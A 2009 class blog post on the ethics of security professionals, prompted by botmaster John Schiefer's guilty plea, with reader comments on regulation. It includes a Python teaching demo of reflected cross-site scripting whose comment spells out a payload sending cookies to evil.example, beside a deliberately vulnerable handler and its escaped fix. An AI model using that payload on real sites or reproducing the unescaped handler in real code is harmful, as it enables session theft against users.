Security Professional Works as Botmaster

By erielt at 4:55 pm on January 30, 2009 | 2 Comments

Security professional John Schiefer has continued to work in the computer security field during the 15 months since he pleaded guilty, in November 2007, to being the botmaster of a 250,000-machine bot herd (http://www.theregister.co.uk/2009/01/23/botmaster_sentencing_kerfuffle/). While awaiting sentencing, the Los Angeles-based consultant says he has worked both as a security professional and as a network engineer for an Internet startup. Prosecutors have requested the minimum 60-month sentence, followed by five years of supervised release. Luckily, everyone in this class has signed an ethics form, so nothing like this will happen.

The primary concern with this incident is the lack of regulation for people with specialized and potentially dangerous knowledge and skills. Although there is a real need for people with these skills, there need to be laws in place so that those who abuse them face serious consequences. A similar situation exists with locksmiths, whose knowledge and tools could likewise be abused to harm society. Unfortunately, the wild west of the Internet is not yet established enough to have these legal issues and restrictions ironed out.

What is especially disconcerting is that Schiefer's ethics were flexible enough for him to abandon professionalism and take advantage of others. This tarnishes the reputation of all security professionals. Although there are bad actors in every profession, the idea that little separates the good and the bad of security, the white hats and the black hats, is a concern the security community must confront. The fact that a company hired Schiefer to continue working as a security consultant after his guilty plea also hints at how malleable the ethical ideals associated with computer security as a whole can be.

Another issue this situation raises is how to hold those who abuse computer security skills accountable. This is particularly relevant for our class: although ethics forms were signed, what keeps students responsible for the knowledge they learn? The attacks and techniques covered in class apply to the web as a whole and could easily be abused for malicious purposes. To cite a recent example, cross-site scripting attacks can be carried out across the web, sometimes with little effort and to devastating effect. Even companies such as Google are not immune, as the recent exploit (and subsequent fix) of the Google Sites login page shows. Overall, I believe the concern isn't whether these skills should be taught (the knowledge can easily be gained from other sources), but how to hold accountable those who use their abilities to exploit society. As the Schiefer incident shows, ethics can be extremely volatile; perhaps they shouldn't be relied on to keep those in the security field from dabbling in illegal black-hat activity.
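To make that class of attack concrete, here is a minimal sketch, in Python with only the standard library, of how a reflected cross-site scripting bug arises and how output escaping defuses it. The routes and handler below are hypothetical illustrations of mine, not details of the actual Google Sites flaw.

import html
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

class SearchHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        params = parse_qs(urlparse(self.path).query)
        q = params.get("q", [""])[0]
        if self.path.startswith("/unsafe"):
            # Vulnerable: attacker-controlled input is reflected into the page as
            # markup, so a crafted link such as
            #   /unsafe?q=<script>document.location='http://evil.example/?c='+document.cookie</script>
            # runs the attacker's JavaScript in the victim's browser.
            body = "<p>Results for: " + q + "</p>"
        else:
            # Mitigated: html.escape turns <, >, and quotes into entities,
            # so the same payload renders as inert text instead of executing.
            body = "<p>Results for: " + html.escape(q) + "</p>"
        self.send_response(200)
        self.send_header("Content-Type", "text/html; charset=utf-8")
        self.end_headers()
        self.wfile.write(body.encode("utf-8"))

if __name__ == "__main__":
    HTTPServer(("localhost", 8000), SearchHandler).serve_forever()

In practice, template engines with automatic escaping do this work rather than hand-rolled string concatenation, but the underlying mistake and fix are the same.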

Filed under: Current Events, Ethics

2 Comments

  • 1

    Comment by petermil

    January 30, 2009 @ 6:35 pm

    Ultimately the pool of people with security knowledge is limited, and as the first lab showed, the way to gain experience in these matters is to actually do them (preferably in a simulated setting like that, obviously). The people who carry out security attacks, run botnets, etc. are the same people who have the skills and 'insider' information necessary to defend against others who might do so in the future.

    Unfortunately, I don't think there's any real legislation that can be done about this without some major invasions of privacy. Locksmiths have specialized tools they need to obtain, training classes they need to take, etc. A computer hacker can sit in his room at home and learn over the internet from others in an apprenticeship-style manner. The government can't really get involved in this sort of thing, short of having the trainer report it (unlikely) or listening to all traffic (both undesirable and infeasible).
    I don't think news like this is really that bad, ultimately. Bad news is good news, so to speak: when security professionals behave appropriately, find bugs, report them promptly, and work to get them fixed, it doesn't make much news. It's the rare-ish stories like this that give the impression the situation is much worse, because they're the ones people want to read about.

  • 2

    Comment by Evil Rocks

    January 31, 2009 @ 11:55 am

    Interesting parallel: the emergence of DIY biohacking and the regulation of people in that field. I read a profile of the fellow who established one of the first real-life peer-teaching groups of biohackers, and his position on dangerous information and skills runs along these lines: government regulation is always ineffective, and putting power in the hands of the government inevitably leads to people rebelling against it with the very tools being regulated (ex: the IRA, IEDs in Iraq/'stan, DIY missile construction in Gaza, &c.). His alternative is peer regulation: it is more effective to build a community and ask that community to define its ethics and police its own members.

    This approach has been very successful in the medical and legal fields, and it taps into an emerging trend toward community and self-regulation.
